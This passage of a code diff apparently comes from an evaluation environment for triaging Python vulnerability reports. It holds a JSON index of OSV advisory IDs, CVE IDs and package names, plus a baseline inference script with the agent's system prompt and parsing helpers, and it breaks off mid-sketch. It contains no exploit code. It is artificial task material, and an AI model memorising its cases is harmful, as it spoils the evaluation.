+       "osv_id": "PYSEC-2020-205",
+       "file": "data/snapshots/PYSEC-2020-205.json",
+       "cve_id": "CVE-2014-4967",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-206",
+       "file": "data/snapshots/PYSEC-2020-206.json",
+       "cve_id": "CVE-2019-14905",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-207",
+       "file": "data/snapshots/PYSEC-2020-207.json",
+       "cve_id": "CVE-2020-10684",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-208",
+       "file": "data/snapshots/PYSEC-2020-208.json",
+       "cve_id": "CVE-2020-10744",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-209",
+       "file": "data/snapshots/PYSEC-2020-209.json",
+       "cve_id": "CVE-2020-14365",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-21",
+       "file": "data/snapshots/PYSEC-2020-21.json",
+       "cve_id": "CVE-2020-17515",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-210",
+       "file": "data/snapshots/PYSEC-2020-210.json",
+       "cve_id": "CVE-2020-1753",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-22",
+       "file": "data/snapshots/PYSEC-2020-22.json",
+       "cve_id": "CVE-2020-17526",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-220",
+       "file": "data/snapshots/PYSEC-2020-220.json",
+       "cve_id": "CVE-2020-25635",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-221",
+       "file": "data/snapshots/PYSEC-2020-221.json",
+       "cve_id": null,
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-23",
+       "file": "data/snapshots/PYSEC-2020-23.json",
+       "cve_id": "CVE-2020-9485",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-262",
+       "file": "data/snapshots/PYSEC-2020-262.json",
+       "cve_id": "CVE-2020-17511",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-3",
+       "file": "data/snapshots/PYSEC-2020-3.json",
+       "cve_id": "CVE-2020-14330",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-4",
+       "file": "data/snapshots/PYSEC-2020-4.json",
+       "cve_id": "CVE-2020-14332",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-5",
+       "file": "data/snapshots/PYSEC-2020-5.json",
+       "cve_id": "CVE-2020-1733",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-6",
+       "file": "data/snapshots/PYSEC-2020-6.json",
+       "cve_id": "CVE-2020-1734",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-7",
+       "file": "data/snapshots/PYSEC-2020-7.json",
577
+ "cve_id": "CVE-2020-1735",
578
+ "package": "ansible"
579
+ },
580
+ {
581
+ "osv_id": "PYSEC-2020-8",
582
+ "file": "data/snapshots/PYSEC-2020-8.json",
583
+ "cve_id": "CVE-2020-1736",
584
+ "package": "ansible"
585
+ },
586
+ {
587
+ "osv_id": "PYSEC-2020-9",
588
+ "file": "data/snapshots/PYSEC-2020-9.json",
589
+ "cve_id": "CVE-2020-1737",
590
+ "package": "ansible"
591
+ },
592
+ {
593
+ "osv_id": "PYSEC-2021-1",
594
+ "file": "data/snapshots/PYSEC-2021-1.json",
595
+ "cve_id": "CVE-2021-20228",
596
+ "package": "ansible"
597
+ },
598
+ {
599
+ "osv_id": "PYSEC-2021-105",
600
+ "file": "data/snapshots/PYSEC-2021-105.json",
601
+ "cve_id": "CVE-2020-10729",
602
+ "package": "ansible"
603
+ },
604
+ {
605
+ "osv_id": "PYSEC-2021-106",
606
+ "file": "data/snapshots/PYSEC-2021-106.json",
607
+ "cve_id": "CVE-2021-20178",
608
+ "package": "ansible"
609
+ },
610
+ {
611
+ "osv_id": "PYSEC-2021-107",
612
+ "file": "data/snapshots/PYSEC-2021-107.json",
613
+ "cve_id": "CVE-2021-3447",
614
+ "package": "ansible"
615
+ },
616
+ {
617
+ "osv_id": "PYSEC-2021-122",
618
+ "file": "data/snapshots/PYSEC-2021-122.json",
619
+ "cve_id": "CVE-2021-35936",
620
+ "package": "apache-airflow"
621
+ },
622
+ {
623
+ "osv_id": "PYSEC-2021-124",
624
+ "file": "data/snapshots/PYSEC-2021-124.json",
625
+ "cve_id": "CVE-2021-20191",
626
+ "package": "ansible"
627
+ },
628
+ {
629
+ "osv_id": "PYSEC-2021-125",
630
+ "file": "data/snapshots/PYSEC-2021-125.json",
631
+ "cve_id": null,
632
+ "package": "ansible"
633
+ },
634
+ {
635
+ "osv_id": "PYSEC-2021-126",
636
+ "file": "data/snapshots/PYSEC-2021-126.json",
637
+ "cve_id": "CVE-2021-3533",
638
+ "package": "ansible"
639
+ },
640
+ {
641
+ "osv_id": "PYSEC-2021-2",
642
+ "file": "data/snapshots/PYSEC-2021-2.json",
643
+ "cve_id": "CVE-2021-26559",
644
+ "package": "apache-airflow"
645
+ },
646
+ {
647
+ "osv_id": "PYSEC-2021-3",
648
+ "file": "data/snapshots/PYSEC-2021-3.json",
649
+ "cve_id": "CVE-2021-26697",
650
+ "package": "apache-airflow"
651
+ },
652
+ {
653
+ "osv_id": "PYSEC-2021-326",
654
+ "file": "data/snapshots/PYSEC-2021-326.json",
655
+ "cve_id": "CVE-2021-38540",
656
+ "package": "apache-airflow"
657
+ },
658
+ {
659
+ "osv_id": "PYSEC-2021-335",
660
+ "file": "data/snapshots/PYSEC-2021-335.json",
661
+ "cve_id": "CVE-2021-32807",
662
+ "package": "accesscontrol"
663
+ },
664
+ {
665
+ "osv_id": "PYSEC-2021-358",
666
+ "file": "data/snapshots/PYSEC-2021-358.json",
667
+ "cve_id": "CVE-2021-3583",
668
+ "package": "ansible"
669
+ },
670
+ {
671
+ "osv_id": "PYSEC-2021-370",
672
+ "file": "data/snapshots/PYSEC-2021-370.json",
673
+ "cve_id": "CVE-2021-32807",
674
+ "package": "accesscontrol"
675
+ },
676
+ {
677
+ "osv_id": "PYSEC-2021-4",
678
+ "file": "data/snapshots/PYSEC-2021-4.json",
679
+ "cve_id": "CVE-2021-28359",
680
+ "package": "apache-airflow"
681
+ },
682
+ {
683
+ "osv_id": "PYSEC-2021-76",
684
+ "file": "data/snapshots/PYSEC-2021-76.json",
685
+ "cve_id": "CVE-2021-21330",
686
+ "package": "aiohttp"
687
+ },
688
+ {
689
+ "osv_id": "PYSEC-2021-839",
690
+ "file": "data/snapshots/PYSEC-2021-839.json",
691
+ "cve_id": "CVE-2021-43775",
692
+ "package": "aim"
693
+ },
694
+ {
695
+ "osv_id": "PYSEC-2021-840",
696
+ "file": "data/snapshots/PYSEC-2021-840.json",
697
+ "cve_id": "CVE-2021-3840",
698
+ "package": "antilles-tools"
699
+ },
700
+ {
701
+ "osv_id": "PYSEC-2021-876",
702
+ "file": "data/snapshots/PYSEC-2021-876.json",
703
+ "cve_id": "CVE-2020-13922",
704
+ "package": "apache-dolphinscheduler"
705
+ },
706
+ {
707
+ "osv_id": "PYSEC-2022-11",
708
+ "file": "data/snapshots/PYSEC-2022-11.json",
709
+ "cve_id": "CVE-2021-45230",
710
+ "package": "apache-airflow"
711
+ },
712
+ {
713
+ "osv_id": "PYSEC-2022-164",
714
+ "file": "data/snapshots/PYSEC-2022-164.json",
715
+ "cve_id": "CVE-2021-3620",
716
+ "package": "ansible"
717
+ },
718
+ {
719
+ "osv_id": "PYSEC-2022-176",
720
+ "file": "data/snapshots/PYSEC-2022-176.json",
721
+ "cve_id": "CVE-2022-25598",
722
+ "package": "apache-dolphinscheduler"
723
+ },
724
+ {
725
+ "osv_id": "PYSEC-2022-182",
726
+ "file": "data/snapshots/PYSEC-2022-182.json",
727
+ "cve_id": "CVE-2018-25033",
728
+ "package": "admesh"
729
+ },
730
+ {
731
+ "osv_id": "PYSEC-2022-253",
732
+ "file": "data/snapshots/PYSEC-2022-253.json",
733
+ "cve_id": "CVE-2021-4041",
734
+ "package": "ansible-runner"
735
+ },
736
+ {
737
+ "osv_id": "PYSEC-2022-261",
738
+ "file": "data/snapshots/PYSEC-2022-261.json",
739
+ "cve_id": "CVE-2022-38170",
740
+ "package": "apache-airflow"
741
+ },
742
+ {
743
+ "osv_id": "PYSEC-2022-263",
744
+ "file": "data/snapshots/PYSEC-2022-263.json",
745
+ "cve_id": "CVE-2022-38054",
746
+ "package": "apache-airflow"
747
+ },
748
+ {
749
+ "osv_id": "PYSEC-2022-279",
750
+ "file": "data/snapshots/PYSEC-2022-279.json",
751
+ "cve_id": "CVE-2022-40604",
752
+ "package": "apache-airflow"
753
+ },
754
+ {
755
+ "osv_id": "PYSEC-2022-280",
756
+ "file": "data/snapshots/PYSEC-2022-280.json",
757
+ "cve_id": "CVE-2022-40754",
758
+ "package": "apache-airflow"
759
+ },
760
+ {
761
+ "osv_id": "PYSEC-2022-29",
762
+ "file": "data/snapshots/PYSEC-2022-29.json",
763
+ "cve_id": "CVE-2021-45229",
764
+ "package": "apache-airflow"
765
+ },
766
+ {
767
+ "osv_id": "PYSEC-2022-30",
768
+ "file": "data/snapshots/PYSEC-2022-30.json",
769
+ "cve_id": "CVE-2022-24288",
770
+ "package": "apache-airflow"
771
+ },
772
+ {
773
+ "osv_id": "PYSEC-2022-42970",
774
+ "file": "data/snapshots/PYSEC-2022-42970.json",
775
+ "cve_id": "CVE-2022-43982",
776
+ "package": "apache-airflow"
777
+ },
778
+ {
779
+ "osv_id": "PYSEC-2022-42971",
780
+ "file": "data/snapshots/PYSEC-2022-42971.json",
781
+ "cve_id": "CVE-2022-43985",
782
+ "package": "apache-airflow"
783
+ },
784
+ {
785
+ "osv_id": "PYSEC-2022-42972",
786
+ "file": "data/snapshots/PYSEC-2022-42972.json",
787
+ "cve_id": "CVE-2022-43766",
788
+ "package": "apache-iotdb"
789
+ },
790
+ {
791
+ "osv_id": "PYSEC-2022-42981",
792
+ "file": "data/snapshots/PYSEC-2022-42981.json",
793
+ "cve_id": "CVE-2022-27949",
794
+ "package": "apache-airflow"
795
+ },
796
+ {
797
+ "osv_id": "PYSEC-2022-42982",
798
+ "file": "data/snapshots/PYSEC-2022-42982.json",
799
+ "cve_id": "CVE-2022-40127",
800
+ "package": "apache-airflow"
801
+ },
802
+ {
803
+ "osv_id": "PYSEC-2022-42983",
804
+ "file": "data/snapshots/PYSEC-2022-42983.json",
805
+ "cve_id": "CVE-2022-41672",
806
+ "package": "apache-airflow"
807
+ },
808
+ {
809
+ "osv_id": "PYSEC-2022-42984",
810
+ "file": "data/snapshots/PYSEC-2022-42984.json",
811
+ "cve_id": "CVE-2022-45402",
812
+ "package": "apache-airflow"
813
+ },
814
+ {
815
+ "osv_id": "PYSEC-2022-43059",
816
+ "file": "data/snapshots/PYSEC-2022-43059.json",
817
+ "cve_id": null,
818
+ "package": "aiohttp"
819
+ },
820
+ {
821
+ "osv_id": "PYSEC-2022-43060",
822
+ "file": "data/snapshots/PYSEC-2022-43060.json",
823
+ "cve_id": "CVE-2022-32531",
824
+ "package": "apache-bookkeeper-client"
825
+ },
826
+ {
827
+ "osv_id": "PYSEC-2022-43066",
828
+ "file": "data/snapshots/PYSEC-2022-43066.json",
829
+ "cve_id": null,
830
+ "package": "aamiles"
831
+ },
832
+ {
833
+ "osv_id": "PYSEC-2022-43067",
834
+ "file": "data/snapshots/PYSEC-2022-43067.json",
835
+ "cve_id": "CVE-2021-3701",
836
+ "package": "ansible-runner"
837
+ },
838
+ {
839
+ "osv_id": "PYSEC-2022-43068",
840
+ "file": "data/snapshots/PYSEC-2022-43068.json",
841
+ "cve_id": "CVE-2021-3702",
842
+ "package": "ansible-runner"
843
+ },
844
+ {
845
+ "osv_id": "PYSEC-2022-43069",
846
+ "file": "data/snapshots/PYSEC-2022-43069.json",
847
+ "cve_id": "CVE-2022-38369",
848
+ "package": "apache-iotdb"
849
+ },
850
+ {
851
+ "osv_id": "PYSEC-2022-43070",
852
+ "file": "data/snapshots/PYSEC-2022-43070.json",
853
+ "cve_id": null,
854
+ "package": "apache-iotdb"
855
+ },
856
+ {
857
+ "osv_id": "PYSEC-2023-1",
858
+ "file": "data/snapshots/PYSEC-2023-1.json",
859
+ "cve_id": null,
860
+ "package": "adyen"
861
+ },
862
+ {
863
+ "osv_id": "PYSEC-2023-103",
864
+ "file": "data/snapshots/PYSEC-2023-103.json",
865
+ "cve_id": "CVE-2022-46651",
866
+ "package": "apache-airflow"
867
+ },
868
+ {
869
+ "osv_id": "PYSEC-2023-104",
870
+ "file": "data/snapshots/PYSEC-2023-104.json",
871
+ "cve_id": "CVE-2023-22887",
872
+ "package": "apache-airflow"
873
+ },
874
+ {
875
+ "osv_id": "PYSEC-2023-105",
876
+ "file": "data/snapshots/PYSEC-2023-105.json",
877
+ "cve_id": "CVE-2023-22888",
878
+ "package": "apache-airflow"
879
+ },
880
+ {
881
+ "osv_id": "PYSEC-2023-106",
882
+ "file": "data/snapshots/PYSEC-2023-106.json",
883
+ "cve_id": "CVE-2023-36543",
884
+ "package": "apache-airflow"
885
+ },
886
+ {
887
+ "osv_id": "PYSEC-2023-119",
888
+ "file": "data/snapshots/PYSEC-2023-119.json",
889
+ "cve_id": "CVE-2023-35908",
890
+ "package": "apache-airflow"
891
+ },
892
+ {
893
+ "osv_id": "PYSEC-2023-120",
894
+ "file": "data/snapshots/PYSEC-2023-120.json",
895
+ "cve_id": "CVE-2023-37276",
896
+ "package": "aiohttp"
897
+ },
898
+ {
899
+ "osv_id": "PYSEC-2023-134",
900
+ "file": "data/snapshots/PYSEC-2023-134.json",
901
+ "cve_id": "CVE-2023-39508",
902
+ "package": "apache-airflow"
903
+ },
904
+ {
905
+ "osv_id": "PYSEC-2023-136",
906
+ "file": "data/snapshots/PYSEC-2023-136.json",
907
+ "cve_id": "CVE-2023-39553",
908
+ "package": "apache-airflow"
909
+ },
910
+ {
911
+ "osv_id": "PYSEC-2023-152",
912
+ "file": "data/snapshots/PYSEC-2023-152.json",
913
+ "cve_id": "CVE-2023-37379",
914
+ "package": "apache-airflow"
915
+ },
916
+ {
917
+ "osv_id": "PYSEC-2023-156",
918
+ "file": "data/snapshots/PYSEC-2023-156.json",
919
+ "cve_id": "CVE-2023-40195",
920
+ "package": "apache-airflow-providers-apache-spark"
921
+ },
922
+ {
923
+ "osv_id": "PYSEC-2023-158",
924
+ "file": "data/snapshots/PYSEC-2023-158.json",
925
+ "cve_id": "CVE-2023-40273",
926
+ "package": "apache-airflow"
927
+ },
928
+ {
929
+ "osv_id": "PYSEC-2023-170",
930
+ "file": "data/snapshots/PYSEC-2023-170.json",
931
+ "cve_id": "CVE-2023-40611",
932
+ "package": "apache-airflow"
933
+ },
934
+ {
935
+ "osv_id": "PYSEC-2023-171",
936
+ "file": "data/snapshots/PYSEC-2023-171.json",
937
+ "cve_id": "CVE-2023-40712",
938
+ "package": "apache-airflow"
939
+ },
940
+ {
941
+ "osv_id": "PYSEC-2023-197",
942
+ "file": "data/snapshots/PYSEC-2023-197.json",
943
+ "cve_id": "CVE-2023-42663",
944
+ "package": "apache-airflow"
945
+ },
946
+ {
947
+ "osv_id": "PYSEC-2023-2",
948
+ "file": "data/snapshots/PYSEC-2023-2.json",
949
+ "cve_id": "CVE-2023-25695",
950
+ "package": "apache-airflow"
951
+ },
952
+ {
953
+ "osv_id": "PYSEC-2023-202",
954
+ "file": "data/snapshots/PYSEC-2023-202.json",
955
+ "cve_id": "CVE-2023-42780",
956
+ "package": "apache-airflow"
957
+ },
958
+ {
959
+ "osv_id": "PYSEC-2023-203",
960
+ "file": "data/snapshots/PYSEC-2023-203.json",
961
+ "cve_id": "CVE-2023-42792",
962
+ "package": "apache-airflow"
963
+ },
964
+ {
965
+ "osv_id": "PYSEC-2023-204",
966
+ "file": "data/snapshots/PYSEC-2023-204.json",
967
+ "cve_id": "CVE-2023-45348",
968
+ "package": "apache-airflow"
969
+ },
970
+ {
971
+ "osv_id": "PYSEC-2023-218",
972
+ "file": "data/snapshots/PYSEC-2023-218.json",
973
+ "cve_id": "CVE-2023-46288",
974
+ "package": "apache-airflow"
975
+ },
976
+ {
977
+ "osv_id": "PYSEC-2023-231",
978
+ "file": "data/snapshots/PYSEC-2023-231.json",
979
+ "cve_id": "CVE-2023-42781",
980
+ "package": "apache-airflow"
981
+ },
982
+ {
983
+ "osv_id": "PYSEC-2023-232",
984
+ "file": "data/snapshots/PYSEC-2023-232.json",
985
+ "cve_id": "CVE-2023-47037",
986
+ "package": "apache-airflow"
987
+ },
988
+ {
989
+ "osv_id": "PYSEC-2023-246",
990
+ "file": "data/snapshots/PYSEC-2023-246.json",
991
+ "cve_id": "CVE-2023-47627",
992
+ "package": "aiohttp"
993
+ },
994
+ {
995
+ "osv_id": "PYSEC-2023-247",
996
+ "file": "data/snapshots/PYSEC-2023-247.json",
997
+ "cve_id": "CVE-2023-47641",
998
+ "package": "aiohttp"
999
+ },
1000
+ {
1001
+ "osv_id": "PYSEC-2023-250",
1002
+ "file": "data/snapshots/PYSEC-2023-250.json",
1003
+ "cve_id": "CVE-2023-49081",
1004
+ "package": "aiohttp"
1005
+ },
1006
+ {
1007
+ "osv_id": "PYSEC-2023-251",
1008
+ "file": "data/snapshots/PYSEC-2023-251.json",
1009
+ "cve_id": "CVE-2023-49082",
1010
+ "package": "aiohttp"
1011
+ },
1012
+ {
1013
+ "osv_id": "PYSEC-2023-263",
1014
+ "file": "data/snapshots/PYSEC-2023-263.json",
1015
+ "cve_id": null,
1016
+ "package": "admesh"
1017
+ },
1018
+ {
1019
+ "osv_id": "PYSEC-2023-264",
1020
+ "file": "data/snapshots/PYSEC-2023-264.json",
1021
+ "cve_id": "CVE-2023-47265",
1022
+ "package": "apache-airflow"
1023
+ },
1024
+ {
1025
+ "osv_id": "PYSEC-2023-265",
1026
+ "file": "data/snapshots/PYSEC-2023-265.json",
1027
+ "cve_id": "CVE-2023-48291",
1028
+ "package": "apache-airflow"
1029
+ },
1030
+ {
1031
+ "osv_id": "PYSEC-2023-266",
1032
+ "file": "data/snapshots/PYSEC-2023-266.json",
1033
+ "cve_id": "CVE-2023-49920",
1034
+ "package": "apache-airflow"
1035
+ },
1036
+ {
1037
+ "osv_id": "PYSEC-2023-267",
1038
+ "file": "data/snapshots/PYSEC-2023-267.json",
1039
+ "cve_id": "CVE-2023-50783",
1040
+ "package": "apache-airflow"
1041
+ },
1042
+ {
1043
+ "osv_id": "PYSEC-2023-268",
1044
+ "file": "data/snapshots/PYSEC-2023-268.json",
1045
+ "cve_id": "CVE-2023-48796",
1046
+ "package": "apache-dolphinscheduler"
1047
+ },
1048
+ {
1049
+ "osv_id": "PYSEC-2023-3",
1050
+ "file": "data/snapshots/PYSEC-2023-3.json",
1051
+ "cve_id": "CVE-2023-28707",
1052
+ "package": "apache-airflow"
1053
+ },
1054
+ {
1055
+ "osv_id": "PYSEC-2023-4",
1056
+ "file": "data/snapshots/PYSEC-2023-4.json",
1057
+ "cve_id": "CVE-2022-45875",
1058
+ "package": "apache-dolphinscheduler"
1059
+ },
1060
+ {
1061
+ "osv_id": "PYSEC-2023-5",
1062
+ "file": "data/snapshots/PYSEC-2023-5.json",
1063
+ "cve_id": "CVE-2023-24829",
1064
+ "package": "apache-iotdb"
1065
+ },
1066
+ {
1067
+ "osv_id": "PYSEC-2023-59",
1068
+ "file": "data/snapshots/PYSEC-2023-59.json",
1069
+ "cve_id": "CVE-2023-25754",
1070
+ "package": "apache-airflow"
1071
+ },
1072
+ {
1073
+ "osv_id": "PYSEC-2023-6",
1074
+ "file": "data/snapshots/PYSEC-2023-6.json",
1075
+ "cve_id": "CVE-2023-24830",
1076
+ "package": "apache-iotdb"
1077
+ },
1078
+ {
1079
+ "osv_id": "PYSEC-2023-60",
1080
+ "file": "data/snapshots/PYSEC-2023-60.json",
1081
+ "cve_id": "CVE-2023-29247",
1082
+ "package": "apache-airflow"
1083
+ },
1084
+ {
1085
+ "osv_id": "PYSEC-2023-7",
1086
+ "file": "data/snapshots/PYSEC-2023-7.json",
1087
+ "cve_id": "CVE-2023-24831",
1088
+ "package": "apache-iotdb"
1089
+ },
1090
+ {
1091
+ "osv_id": "PYSEC-2023-8",
1092
+ "file": "data/snapshots/PYSEC-2023-8.json",
1093
+ "cve_id": "CVE-2023-30771",
1094
+ "package": "apache-iotdb"
1095
+ },
1096
+ {
1097
+ "osv_id": "PYSEC-2023-89",
1098
+ "file": "data/snapshots/PYSEC-2023-89.json",
1099
+ "cve_id": "CVE-2023-35005",
1100
+ "package": "apache-airflow"
1101
+ },
1102
+ {
1103
+ "osv_id": "PYSEC-2024-13",
1104
+ "file": "data/snapshots/PYSEC-2024-13.json",
1105
+ "cve_id": "CVE-2023-50943",
1106
+ "package": "apache-airflow"
1107
+ },
1108
+ {
1109
+ "osv_id": "PYSEC-2024-14",
1110
+ "file": "data/snapshots/PYSEC-2024-14.json",
1111
+ "cve_id": "CVE-2023-50944",
1112
+ "package": "apache-airflow"
1113
+ },
1114
+ {
1115
+ "osv_id": "PYSEC-2024-152",
1116
+ "file": "data/snapshots/PYSEC-2024-152.json",
1117
+ "cve_id": null,
1118
+ "package": "aiocpa"
1119
+ },
1120
+ {
1121
+ "osv_id": "PYSEC-2024-181",
1122
+ "file": "data/snapshots/PYSEC-2024-181.json",
1123
+ "cve_id": "CVE-2024-41937",
1124
+ "package": "apache-airflow"
1125
+ },
1126
+ {
1127
+ "osv_id": "PYSEC-2024-182",
1128
+ "file": "data/snapshots/PYSEC-2024-182.json",
1129
+ "cve_id": "CVE-2024-45784",
1130
+ "package": "apache-airflow"
1131
+ },
1132
+ {
1133
+ "osv_id": "PYSEC-2024-189",
1134
+ "file": "data/snapshots/PYSEC-2024-189.json",
1135
+ "cve_id": "CVE-2024-39863",
1136
+ "package": "apache-airflow"
1137
+ },
1138
+ {
1139
+ "osv_id": "PYSEC-2024-190",
1140
+ "file": "data/snapshots/PYSEC-2024-190.json",
1141
+ "cve_id": "CVE-2024-39877",
1142
+ "package": "apache-airflow"
1143
+ },
1144
+ {
1145
+ "osv_id": "PYSEC-2024-195",
1146
+ "file": "data/snapshots/PYSEC-2024-195.json",
1147
+ "cve_id": "CVE-2024-25142",
1148
+ "package": "apache-airflow"
1149
+ },
1150
+ {
1151
+ "osv_id": "PYSEC-2024-212",
1152
+ "file": "data/snapshots/PYSEC-2024-212.json",
1153
+ "cve_id": "CVE-2024-45034",
1154
+ "package": "apache-airflow"
1155
+ },
1156
+ {
1157
+ "osv_id": "PYSEC-2024-221",
1158
+ "file": "data/snapshots/PYSEC-2024-221.json",
1159
+ "cve_id": "CVE-2024-27305",
1160
+ "package": "aiosmtpd"
1161
+ },
1162
+ {
1163
+ "osv_id": "PYSEC-2024-24",
1164
+ "file": "data/snapshots/PYSEC-2024-24.json",
1165
+ "cve_id": "CVE-2024-23334",
1166
+ "package": "aiohttp"
1167
+ },
1168
+ {
1169
+ "osv_id": "PYSEC-2024-245",
1170
+ "file": "data/snapshots/PYSEC-2024-245.json",
1171
+ "cve_id": "CVE-2024-27906",
1172
+ "package": "apache-airflow"
1173
+ },
1174
+ {
1175
+ "osv_id": "PYSEC-2024-26",
1176
+ "file": "data/snapshots/PYSEC-2024-26.json",
1177
+ "cve_id": "CVE-2024-23829",
1178
+ "package": "aiohttp"
1179
+ },
1180
+ {
1181
+ "osv_id": "PYSEC-2024-36",
1182
+ "file": "data/snapshots/PYSEC-2024-36.json",
1183
+ "cve_id": "CVE-2024-0690",
1184
+ "package": "ansible-core"
1185
+ },
1186
+ {
1187
+ "osv_id": "PYSEC-2024-42",
1188
+ "file": "data/snapshots/PYSEC-2024-42.json",
1189
+ "cve_id": "CVE-2024-26280",
1190
+ "package": "apache-airflow"
1191
+ },
1192
+ {
1193
+ "osv_id": "PYSEC-2024-46",
1194
+ "file": "data/snapshots/PYSEC-2024-46.json",
1195
+ "cve_id": "CVE-2024-28746",
1196
+ "package": "apache-airflow"
1197
+ },
1198
+ {
1199
+ "osv_id": "PYSEC-2025-51",
1200
+ "file": "data/snapshots/PYSEC-2025-51.json",
1201
+ "cve_id": "CVE-2025-50213",
1202
+ "package": "apache-airflow-providers-snowflake"
1203
+ }
1204
+ ]
1205
+ }
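The snapshot index above is a flat list of `{osv_id, file, cve_id, package}` records, with `cve_id` set to null when no CVE was assigned. A minimal sketch of consuming such records, using two entries copied verbatim from the index, might look like:

```python
from collections import Counter

# Two records copied from the snapshot index above.
entries = [
    {"osv_id": "PYSEC-2020-199", "file": "data/snapshots/PYSEC-2020-199.json",
     "cve_id": "CVE-2014-4657", "package": "ansible"},
    {"osv_id": "PYSEC-2020-221", "file": "data/snapshots/PYSEC-2020-221.json",
     "cve_id": None, "package": "ansible"},
]

# Group advisories by package and collect the ones lacking a CVE assignment.
per_package = Counter(e["package"] for e in entries)
missing_cve = [e["osv_id"] for e in entries if e["cve_id"] is None]
print(per_package["ansible"], missing_cve)
```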
inference.py ADDED
@@ -0,0 +1,313 @@
1
+ """Baseline inference script for the vulnerability triage environment."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import argparse
6
+ import json
7
+ import os
8
+ from typing import Dict, List
9
+
10
+ from openai import OpenAI
11
+ from openenv.core import GenericEnvClient
12
+
13
+ API_BASE_URL = os.getenv("API_BASE_URL", "https://api.openai.com/v1")
14
+ MODEL_NAME = os.getenv("MODEL_NAME", "gpt-4o-mini")
15
+ HF_TOKEN = os.getenv("HF_TOKEN")
16
+
17
+ from models import VulnTriageAction
18
+ from server.cases import TASK_ORDER, get_case_definition
19
+ from server.vuln_triage_env_environment import VulnTriageEnvironment
20
+
21
+
22
+ SYSTEM_PROMPT = """You are triaging open-source vulnerability reports.
23
+ Return ONLY a single JSON object — no prose, no markdown — with exactly these keys:
24
+ action_type : string (required) — one of the action types listed in available_actions
25
+ evidence_id : string (optional) — only used with inspect_evidence
26
+ value : string (optional) — a PLAIN STRING, never an object or array
27
+ rationale : string (required) — one short sentence
28
+
29
+ Valid action_type values and their expected value strings:
30
+ read_report — no value needed
31
+ inspect_evidence — set evidence_id to one id from available_evidence
32
+ search_nvd_database — value: CVE ID (e.g. CVE-2023-1234) found in report aliases
33
+ fetch_commit_diff — value: commit hash or hash fragment found in references
34
+ message_maintainer — value: a question for the maintainer (e.g. "Is there a patch?")
35
+ set_validity — value: "valid" | "invalid" | "needs_more_info"
36
+ set_affected_package — value: package name string, e.g. "guarddog"
37
+ set_affected_versions — value: semver range string, e.g. "<0.1.5"
38
+ set_severity — value: "low" | "medium" | "high" | "critical"
39
+ set_exploitability — value: "low" | "medium" | "high"
40
+ set_next_action — value: "patch" | "publish_advisory" | "close" | "escalate" | "request_info"
41
+ set_missing_information — value: one missing info item as a plain string
42
+ submit_triage — no value needed
43
+
44
+ Strategy: read_report first, then use tools (search_nvd, fetch_commit, message_maintainer) to unlock hidden evidence, then fill all draft fields, then submit.
45
+ Note: You CANNOT inspect "nvd_assessment", "github_commit_diff", or "vendor_status" directly. You must use the tools above to reveal them.
46
+ """
47
+
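As a sanity check of the schema the prompt demands, a well-formed reply is a single flat JSON object whose `value` is always a plain string. A minimal, hypothetical example (the CVE ID here is made up):

```python
import json

# Hypothetical reply following the schema in SYSTEM_PROMPT above.
sample_reply = json.dumps({
    "action_type": "search_nvd_database",
    "value": "CVE-2023-1234",
    "rationale": "Look up the CVE listed in the report aliases.",
})

parsed = json.loads(sample_reply)
assert "action_type" in parsed and "rationale" in parsed  # required keys
assert isinstance(parsed.get("value", ""), str)           # value must be a plain string
print(parsed["action_type"])
```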
48
+
49
+ def get_openai_client() -> OpenAI:
50
+ api_key = HF_TOKEN or os.getenv("OPENAI_API_KEY")
51
+ if not api_key:
52
+ raise RuntimeError("Set HF_TOKEN or OPENAI_API_KEY before running the OpenAI baseline.")
53
+
54
+ kwargs = {"api_key": api_key}
55
+ if API_BASE_URL:
56
+ kwargs["base_url"] = API_BASE_URL
57
+ return OpenAI(**kwargs)
58
+
59
+
60
+ def parse_json_response(text: str) -> Dict[str, str]:
61
+ """Extract the first valid JSON object from a model response.
62
+
63
+ Handles:
64
+ - Markdown fences (```json ... ```)
65
+ - Think-blocks from reasoning models (<think>...</think>)
66
+ - Surrounding prose before/after the JSON object
67
+ """
68
+ import re as _re
69
+ text = text.strip()
70
+ # Strip reasoning/think blocks produced by models like Qwen3 or DeepSeek
71
+ text = _re.sub(r"<think>.*?</think>", "", text, flags=_re.DOTALL | _re.IGNORECASE).strip()
72
+ # Strip markdown fences
73
+ if "```" in text:
74
+ lines = [ln for ln in text.splitlines() if not ln.strip().startswith("```")]
75
+ text = "\n".join(lines).strip()
76
+ # Find the first complete JSON object by bracket matching
77
+ start = text.find("{")
78
+ if start == -1:
79
+ raise ValueError(f"No JSON object found in model response: {text[:200]!r}")
80
+ depth = 0
81
+ in_string = False
82
+ escape = False
83
+ for i, ch in enumerate(text[start:], start):
84
+ if escape:
85
+ escape = False
86
+ continue
87
+ if ch == "\\" and in_string:
88
+ escape = True
89
+ continue
90
+ if ch == '"' and not escape:
91
+ in_string = not in_string
92
+ if in_string:
93
+ continue
94
+ if ch == "{":
95
+ depth += 1
96
+ elif ch == "}":
97
+ depth -= 1
98
+ if depth == 0:
99
+ return json.loads(text[start : i + 1])
100
+ raise ValueError(f"Incomplete JSON object in model response: {text[:200]!r}")
101
+
102
+
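The extraction steps above (strip think-blocks, drop markdown fences, bracket-match the first object) can be sketched standalone; this simplified version omits the string-aware scanning from `parse_json_response`, so it assumes no braces appear inside string values:

```python
import json
import re

def extract_first_json(text: str) -> dict:
    # Simplified sketch of the extraction above (no in-string brace handling).
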